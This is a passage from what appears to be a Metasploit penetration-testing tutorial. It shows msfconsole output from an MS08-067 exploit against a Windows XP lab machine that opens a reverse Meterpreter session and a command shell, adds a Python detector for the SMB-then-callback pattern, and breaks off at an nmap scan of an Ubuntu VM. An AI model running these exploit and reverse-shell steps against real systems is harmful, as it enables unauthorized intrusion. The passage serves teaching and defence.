Chapter 5

Having set the stage, we’re ready to conduct the actual exploitation:

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1487)
msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

  Id  Type         Information  Connection
  --  ----         -----------  ----------
  1   meterpreter               192.168.33.129:8080 -> 192.168.33.130:1036

msf exploit(ms08_067_netapi) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > shell

Process 4060 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

The exploit command initiates our exploit and attempts to attack the target. The attack succeeds and gives us a reverse_tcp Meterpreter payload, which we can view with sessions -l. Only one session is active, but if we targeted multiple systems, several sessions could be open simultaneously. (To view a list of the exploits that created each session, you would enter sessions -l -v.)

The sessions -i 1 command is issued to “interact” with an individual session. Notice that this drops us into a Meterpreter shell. If, for example, a reverse command shell existed, this command would drop us straight to a command prompt. And, finally, we enter shell to jump into an interactive command shell on the target.

Congratulations! You’ve just compromised your first machine! To list the available commands for a particular exploit, you can enter show options.
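From the defender's side, the exchange above has a recognizable shape: an inbound SMB connection (MS08-067 is reached through the Server service on TCP 445) followed seconds later by the target opening a new connection back to the attacking host on an arbitrary port, here 8080. The Python below is an added example, not code from the book, that flags that pattern in constructed connection records; the log format, the 60-second window and the sample addresses are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample connection records (not real traffic): timestamp, src, sport, dst, dport.
# Record 1 is the exploit arriving over SMB; record 2 is the target connecting back to
# the handler on 8080, mirroring the "Meterpreter session 1 opened" line above.
SAMPLE_LOG = """\
2009-06-01T10:00:01 192.168.33.129 1200 192.168.33.130 445
2009-06-01T10:00:03 192.168.33.130 1487 192.168.33.129 8080
2009-06-01T10:05:00 192.168.33.50 3100 192.168.33.130 445
2009-06-01T10:30:00 192.168.33.130 1500 192.168.33.200 80
"""


def parse_log(text):
    """Parse whitespace-separated records into tuples, sorted by timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, sport, dst, dport = line.split()
        events.append((datetime.fromisoformat(ts), src, int(sport), dst, int(dport)))
    return sorted(events)


def find_reverse_shell_candidates(events, window=timedelta(seconds=60), smb_port=445):
    """Return (inbound_smb, callback) pairs.

    A hit is an inbound connection to smb_port on host H from peer P, followed
    within `window` by a new connection from H back to P on any port. That is the
    reverse_tcp shape in the msfconsole output: the handler listens on an arbitrary
    port (8080 in the example) and the compromised target initiates the TCP session.
    """
    hits = []
    for i, smb in enumerate(events):
        ts, src, _sport, dst, dport = smb
        if dport != smb_port:
            continue
        for callback in events[i + 1:]:
            ts2, src2, _sport2, dst2, _dport2 = callback
            if ts2 - ts > window:
                break  # events are sorted, so nothing later can fall in the window
            if src2 == dst and dst2 == src:
                hits.append((smb, callback))
    return hits


if __name__ == "__main__":
    for smb, cb in find_reverse_shell_candidates(parse_log(SAMPLE_LOG)):
        print(f"{cb[1]} answered SMB from {smb[1]} with a callback to {cb[3]}:{cb[4]}")
```

The same correlation works against firewall or NetFlow exports once the records are mapped to the five fields the parser expects.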

Exploiting an Ubuntu Machine

Let’s try a different exploit on an Ubuntu 9.04 virtual machine. The steps are 
pretty much the same as for the preceding exploit except that we will select a 
different payload.

msf > nmap -sT -A -P0 192.168.33.132

[*] exec: nmap -sT -A -P0 192.168.33.132